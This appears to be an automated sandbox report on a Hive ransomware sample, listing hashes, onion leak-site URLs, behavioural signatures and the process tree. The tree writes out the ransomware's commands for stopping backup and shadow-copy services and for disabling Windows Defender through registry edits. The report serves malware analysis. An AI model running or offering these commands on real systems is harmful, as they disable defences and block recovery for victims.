Analysis
-
max time kernel
1615s -
max time network
1686s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
30-10-2022 15:56
Static task
static1
Behavioral task
behavioral1
Sample
decoding_data.exe
Resource
win7-20220901-en
General
-
Target
decoding_data.exe
-
Size
3.4MB
-
MD5
177417be748814f6168171a42545f9dd
-
SHA1
9c8b988e66e0fe6f9dab69b1055e4ee200531094
-
SHA256
47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
-
SHA512
c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
-
SSDEEP
49152:EynbnX4Rsrb/TFvO90dL3BmAFd4A64nsfJUvelzON7j93aqSCD0BUCoQPr8bg11t:EyrAe2lS75Hw+i4JROD5R
Malware Config
Extracted
C:\Program Files\7-Zip\Djfk_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1060 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1688 wevtutil.exe 1600 wevtutil.exe 1544 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1592 bcdedit.exe 1376 bcdedit.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\CompareCopy.tiff => C:\Users\Admin\Pictures\CompareCopy.tiff.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_u6ERjnBSjN00.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\CompareCopy.tiff.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_u6ERjnBSjN00.snwkz decoding_data.exe -
Deletes itself 1 IoCs
pid Process 156 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_nQptgTEF0uA0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_4GGIW74dNPM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\es-ES\msadcer.dll.mui decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21535_.GIF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_BMe5NZFDHVM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.VN.XML.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_noTSj70oEiM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BZCD98SP.POC.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_uRT48ViPeHw0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png decoding_data.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\FlickLearningWizard.exe.mui decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_9H6gmtVrq6g0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_9izlsLDgbTg0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\sentinel.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_nuP5812yZk40.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00018_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_zbOHJ05NKL40.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_dILiZTaeI3o0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Media Player\en-US\wmpnscfg.exe.mui decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_VBy6fNCNPpU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsFormTemplate.html.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_fjQ_P1l4ccQ0.snwkz decoding_data.exe File created C:\Program Files\Microsoft Games\More Games\de-DE\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_AzsOeKt9irQ0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_oBd1g2tGq200.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_kFaza56cGJE0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_lcVA9H_wJsA0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_7s7gnuRJXv80.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_f8xtK18Sak80.snwkz decoding_data.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Library\Analysis\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_TLBvIaWKovY0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_Stknz4D23ws0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL01041_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_Uym-orru-s40.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\LASER.WAV.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_RCsvgZljmT80.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialLetter.dotx.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_S7y1MLBcq3k0.snwkz decoding_data.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_YAdatI28zzE0.snwkz decoding_data.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_mzHr6F4W-BY0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00806_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD__8N1reGhulU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18203_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_LFNL5y8Cw1I0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_myCy9EwomGI0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\GrooveMUI.XML.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_UkH-XKAc6qw0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\TipRes.dll.mui decoding_data.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00442_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_CKQ75RhlbU80.snwkz decoding_data.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\DVD Maker\sonicsptransform.ax decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_epklvSFXRm00.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_MUEeWOjWqoE0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_-ZVeJR7kY_k0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_iSNHAXB0RuU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_6LTK_r4Bz0M0.snwkz decoding_data.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Outlook.en-us\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_FKfyQdsNPew0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_iDsv_KO8V7o0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_dT533n0VMpU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_RR8ufVv1bMs0.snwkz decoding_data.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_DaZl6NWq0Xc0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_qG5BqNqvd4U0.snwkz decoding_data.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo.tdbjhDgbWy8LwRLtRA2ZySAnEzF2Ddz62tMhP48twpD_HvYySuP54SQ0.snwkz decoding_data.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1352 sc.exe 1652 sc.exe 1824 sc.exe 524 sc.exe 1708 sc.exe 1916 sc.exe 852 sc.exe 1952 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2032 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1920 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1496 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 760 powershell.exe 580 powershell.exe 1404 decoding_data.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1688 wevtutil.exe Token: SeBackupPrivilege 1688 wevtutil.exe Token: SeSecurityPrivilege 1600 wevtutil.exe Token: SeBackupPrivilege 1600 wevtutil.exe Token: SeSecurityPrivilege 1544 wevtutil.exe Token: SeBackupPrivilege 1544 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1664 wmic.exe Token: SeSecurityPrivilege 1664 wmic.exe Token: SeTakeOwnershipPrivilege 1664 wmic.exe Token: SeLoadDriverPrivilege 1664 wmic.exe Token: SeSystemProfilePrivilege 1664 wmic.exe Token: SeSystemtimePrivilege 1664 wmic.exe Token: SeProfSingleProcessPrivilege 1664 wmic.exe Token: SeIncBasePriorityPrivilege 1664 wmic.exe Token: SeCreatePagefilePrivilege 1664 wmic.exe Token: SeBackupPrivilege 1664 wmic.exe Token: SeRestorePrivilege 1664 wmic.exe Token: SeShutdownPrivilege 1664 wmic.exe Token: SeDebugPrivilege 1664 wmic.exe Token: SeSystemEnvironmentPrivilege 1664 wmic.exe Token: SeRemoteShutdownPrivilege 1664 wmic.exe Token: SeUndockPrivilege 1664 wmic.exe Token: SeManageVolumePrivilege 1664 wmic.exe Token: 33 1664 wmic.exe Token: 34 1664 wmic.exe Token: 35 1664 wmic.exe Token: SeIncreaseQuotaPrivilege 1412 wmic.exe Token: SeSecurityPrivilege 1412 wmic.exe Token: SeTakeOwnershipPrivilege 1412 wmic.exe Token: SeLoadDriverPrivilege 1412 wmic.exe Token: SeSystemProfilePrivilege 1412 wmic.exe Token: SeSystemtimePrivilege 1412 wmic.exe Token: SeProfSingleProcessPrivilege 1412 wmic.exe Token: SeIncBasePriorityPrivilege 1412 wmic.exe Token: SeCreatePagefilePrivilege 1412 wmic.exe Token: SeBackupPrivilege 1412 wmic.exe Token: SeRestorePrivilege 1412 wmic.exe Token: SeShutdownPrivilege 1412 wmic.exe Token: SeDebugPrivilege 1412 wmic.exe Token: SeSystemEnvironmentPrivilege 1412 wmic.exe Token: SeRemoteShutdownPrivilege 1412 wmic.exe Token: SeUndockPrivilege 1412 wmic.exe Token: SeManageVolumePrivilege 1412 wmic.exe Token: 33 1412 wmic.exe Token: 34 1412 wmic.exe Token: 35 1412 wmic.exe Token: SeIncreaseQuotaPrivilege 1412 wmic.exe Token: SeSecurityPrivilege 1412 wmic.exe Token: SeTakeOwnershipPrivilege 1412 wmic.exe Token: SeLoadDriverPrivilege 1412 wmic.exe Token: SeSystemProfilePrivilege 1412 wmic.exe Token: SeSystemtimePrivilege 1412 wmic.exe Token: SeProfSingleProcessPrivilege 1412 wmic.exe Token: SeIncBasePriorityPrivilege 1412 wmic.exe Token: SeCreatePagefilePrivilege 1412 wmic.exe Token: SeBackupPrivilege 1412 wmic.exe Token: SeRestorePrivilege 1412 wmic.exe Token: SeShutdownPrivilege 1412 wmic.exe Token: SeDebugPrivilege 1412 wmic.exe Token: SeSystemEnvironmentPrivilege 1412 wmic.exe Token: SeRemoteShutdownPrivilege 1412 wmic.exe Token: SeUndockPrivilege 1412 wmic.exe Token: SeManageVolumePrivilege 1412 wmic.exe Token: 33 1412 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1404 wrote to memory of 460 1404 decoding_data.exe 27 PID 1404 wrote to memory of 460 1404 decoding_data.exe 27 PID 1404 wrote to memory of 460 1404 decoding_data.exe 27 PID 460 wrote to memory of 1700 460 net.exe 29 PID 460 wrote to memory of 1700 460 net.exe 29 PID 460 wrote to memory of 1700 460 net.exe 29 PID 1404 wrote to memory of 1680 1404 decoding_data.exe 30 PID 1404 wrote to memory of 1680 1404 decoding_data.exe 30 PID 1404 wrote to memory of 1680 1404 decoding_data.exe 30 PID 1680 wrote to memory of 304 1680 net.exe 32 PID 1680 wrote to memory of 304 1680 net.exe 32 PID 1680 wrote to memory of 304 1680 net.exe 32 PID 1404 wrote to memory of 1720 1404 decoding_data.exe 33 PID 1404 wrote to memory of 1720 1404 decoding_data.exe 33 PID 1404 wrote to memory of 1720 1404 decoding_data.exe 33 PID 1720 wrote to memory of 884 1720 net.exe 35 PID 1720 wrote to memory of 884 1720 net.exe 35 PID 1720 wrote to memory of 884 1720 net.exe 35 PID 1404 wrote to memory of 1956 1404 decoding_data.exe 36 PID 1404 wrote to memory of 1956 1404 decoding_data.exe 36 PID 1404 wrote to memory of 1956 1404 decoding_data.exe 36 PID 1956 wrote to memory of 1188 1956 net.exe 38 PID 1956 wrote to memory of 1188 1956 net.exe 38 PID 1956 wrote to memory of 1188 1956 net.exe 38 PID 1404 wrote to memory of 1636 1404 decoding_data.exe 39 PID 1404 wrote to memory of 1636 1404 decoding_data.exe 39 PID 1404 wrote to memory of 1636 1404 decoding_data.exe 39 PID 1636 wrote to memory of 996 1636 net.exe 41 PID 1636 wrote to memory of 996 1636 net.exe 41 PID 1636 wrote to memory of 996 1636 net.exe 41 PID 1404 wrote to memory of 1436 1404 decoding_data.exe 42 PID 1404 wrote to memory of 1436 1404 decoding_data.exe 42 PID 1404 wrote to memory of 1436 1404 decoding_data.exe 42 PID 1436 wrote to memory of 680 1436 net.exe 44 PID 1436 wrote to memory of 680 1436 net.exe 44 PID 1436 wrote to memory of 680 1436 net.exe 44 PID 1404 wrote to memory of 1628 1404 decoding_data.exe 45 PID 1404 wrote to memory of 1628 1404 decoding_data.exe 45 PID 1404 wrote to memory of 1628 1404 decoding_data.exe 45 PID 1628 wrote to memory of 840 1628 net.exe 47 PID 1628 wrote to memory of 840 1628 net.exe 47 PID 1628 wrote to memory of 840 1628 net.exe 47 PID 1404 wrote to memory of 2036 1404 decoding_data.exe 48 PID 1404 wrote to memory of 2036 1404 decoding_data.exe 48 PID 1404 wrote to memory of 2036 1404 decoding_data.exe 48 PID 2036 wrote to memory of 920 2036 net.exe 50 PID 2036 wrote to memory of 920 2036 net.exe 50 PID 2036 wrote to memory of 920 2036 net.exe 50 PID 1404 wrote to memory of 1708 1404 decoding_data.exe 51 PID 1404 wrote to memory of 1708 1404 decoding_data.exe 51 PID 1404 wrote to memory of 1708 1404 decoding_data.exe 51 PID 1404 wrote to memory of 1916 1404 decoding_data.exe 53 PID 1404 wrote to memory of 1916 1404 decoding_data.exe 53 PID 1404 wrote to memory of 1916 1404 decoding_data.exe 53 PID 1404 wrote to memory of 852 1404 decoding_data.exe 55 PID 1404 wrote to memory of 852 1404 decoding_data.exe 55 PID 1404 wrote to memory of 852 1404 decoding_data.exe 55 PID 1404 wrote to memory of 1952 1404 decoding_data.exe 57 PID 1404 wrote to memory of 1952 1404 decoding_data.exe 57 PID 1404 wrote to memory of 1952 1404 decoding_data.exe 57 PID 1404 wrote to memory of 1352 1404 decoding_data.exe 59 PID 1404 wrote to memory of 1352 1404 decoding_data.exe 59 PID 1404 wrote to memory of 1352 1404 decoding_data.exe 59 PID 1404 wrote to memory of 1652 1404 decoding_data.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1700
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:304
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:884
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1188
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:996
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:680
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:840
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:920
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:1708
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:852
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1952
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:1352
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1652
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:524
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1888
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1988
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:988
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1864
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2028
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:568
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1752
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:536
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:560
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1868
-
-
